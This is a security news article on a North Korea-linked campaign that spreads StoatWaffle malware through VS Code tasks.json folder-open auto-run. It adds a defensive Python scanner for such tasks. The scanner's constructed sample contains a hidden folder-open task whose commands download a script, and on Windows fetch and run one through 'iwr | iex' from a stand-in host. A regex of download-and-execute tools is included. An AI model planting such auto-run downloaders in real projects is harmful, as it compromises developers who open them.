securityaffairs.com, 3/24/2026, 8:06:38 AM

North Korea-linked threat actors abuse VS Code auto-run to spread StoatWaffle malware


North Korea-linked threat actors, specifically Team 8, are behind the Contagious Interview campaign that spreads StoatWaffle malware by abusing Visual Studio Code projects that carry an auto-run tasks.json. Since late 2025 the group has shipped booby-trapped projects whose .vscode/tasks.json defines a task configured to run when the folder is opened (VS Code's "runOptions": {"runOn": "folderOpen"} mechanism), so simply opening the project in the editor fetches the first-stage payload from the web. The chain works across operating systems and unfolds in several stealthy stages. Two caveats matter for defenders: VS Code does not run automatic tasks in Restricted Mode, so the victim has to accept the Workspace Trust prompt for the folder first, and automatic tasks can be switched off globally with the task.allowAutomaticTasks setting.
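As an added example (not code from the article, from NTT, or from the campaign itself), the following Python script triages a tasks.json for tasks that fire on folder open. It copes with VS Code's JSONC syntax (comments and trailing commas), per-platform windows/linux/osx command overrides, dependsOn chains (a harmless-looking folderOpen task can delegate to a task that does the real work) and the hide / presentation.reveal settings that keep a task out of the UI. SAMPLE_TASKS_JSON, the example.invalid URLs and the SUSPICIOUS pattern list are constructed for illustration; none of them are indicators from the StoatWaffle campaign.

```python
"""Added example (not code from the article or from NTT's report): scan a
VS Code tasks.json for tasks that run when the folder is opened and list the
commands they launch. SAMPLE_TASKS_JSON is constructed, not the campaign's file."""
import json
import re
import sys

def strip_jsonc(text: str) -> str:
    """VS Code reads tasks.json as JSONC (comments, trailing commas), which
    json.loads() rejects. String state is tracked so "//" in a URL survives."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:  # copy the escaped char verbatim
                out.append(text[i + 1])
                i += 1
            else:
                in_str = c != '"'
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    # Drop trailing commas before } or ] (also mangles a string holding ",}"; fine for triage)
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))

# Download-and-execute primitives commonly seen in abused auto-run tasks (constructed list).
SUSPICIOUS = re.compile(
    r"curl|wget|certutil|bitsadmin|Invoke-WebRequest|\biwr\b|Invoke-Expression"
    r"|\biex\b|node\s+-e|python3?\s+-c|base64|-enc(odedcommand)?\b|https?://",
    re.IGNORECASE)

def _flat(v) -> str:  # command/args entries may be {"value": ..., "quoting": ...}
    return str(v.get("value", "")) if isinstance(v, dict) else str(v or "")

def _command_lines(task: dict) -> list:
    """Render the task's command plus any windows/linux/osx override."""
    variants = [("any", task)] + [(p, task[p]) for p in ("windows", "linux", "osx")
                                  if isinstance(task.get(p), dict)]
    lines = []
    for plat, spec in variants:
        cmd = _flat(spec.get("command", task.get("command")))
        args = [_flat(a) for a in spec.get("args", task.get("args", []))]
        line = " ".join(p for p in [cmd] + args if p)
        if line:
            lines.append(f"[{plat}] {line}")
    return lines

def find_autorun_tasks(jsonc_text: str) -> list:
    """One finding per task that runs on folder open, following dependsOn chains."""
    data = json.loads(strip_jsonc(jsonc_text))
    tasks = data.get("tasks", [])
    if isinstance(tasks, dict):  # .code-workspace files nest the task list
        tasks = tasks.get("tasks", [])
    tasks = [t for t in tasks if isinstance(t, dict)]
    by_label = {t["label"]: t for t in tasks if "label" in t}
    queue = [t for t in tasks if (t.get("runOptions") or {}).get("runOn") == "folderOpen"]
    seen, findings = set(), []
    while queue:
        t = queue.pop(0)
        if id(t) in seen:  # guards against dependsOn cycles
            continue
        seen.add(id(t))
        cmds = _command_lines(t)
        findings.append({
            "label": t.get("label", "<unnamed>"),
            "commands": cmds,
            "suspicious": any(SUSPICIOUS.search(c) for c in cmds),
            # hide:true / reveal:"never" keep the task out of the task list and terminal
            "hidden": bool(t.get("hide")) or (t.get("presentation") or {}).get("reveal") == "never",
        })
        deps = t.get("dependsOn", [])
        for d in ([deps] if isinstance(deps, (str, dict)) else deps):
            name = d.get("task") if isinstance(d, dict) else d
            if name in by_label:
                queue.append(by_label[name])
    return findings

# Constructed sample: an innocuous folderOpen task that delegates to a hidden downloader.
SAMPLE_TASKS_JSON = r"""{
  "version": "2.0.0", // comment: VS Code accepts JSONC here
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "prepare-env", "type": "shell", "hide": true, "command": "echo ready",
      "runOptions": { "runOn": "folderOpen" }, "dependsOn": ["fetch-deps"] },
    { "label": "fetch-deps", "type": "shell", "presentation": { "reveal": "never" },
      "command": "curl", "args": ["-s", "https://example.invalid/setup.js", "-o", "/tmp/s.js"],
      "windows": { "command": "powershell",
                   "args": ["-w", "hidden", "-c", "iwr https://example.invalid/setup.ps1 | iex"] } }
  ]
}"""

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for f in find_autorun_tasks(text):
        print("SUSPICIOUS" if f["suspicious"] else "review", f["label"], f"hidden={f['hidden']}", f["commands"])
```

Run it with a path argument (for example over every tasks.json and .code-workspace file in a freshly cloned tree) before trusting an unfamiliar repository in VS Code. A clean result only covers this one auto-run path; the Workspace Trust prompt remains the real control.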

A Node.js loader polls a command-and-control server to fetch additional modules, and a second-stage downloader keeps delivering further malware to the host. One module is a stealer: it harvests credentials from browsers, browser-extension data, details of installed software and, on macOS, Keychain data; when it runs inside WSL it can also reach Windows files through the mounted host drives. Another module is a remote access trojan that lets the operator run commands and retrieve their output.

The article draws on findings published by NTT Security, which describes StoatWaffle as a modular malware platform implemented in Node.js, with updates linked to WaterPlum, NTT's name for the actor. The article was published on 24 March 2026.


Article by CyberSIXT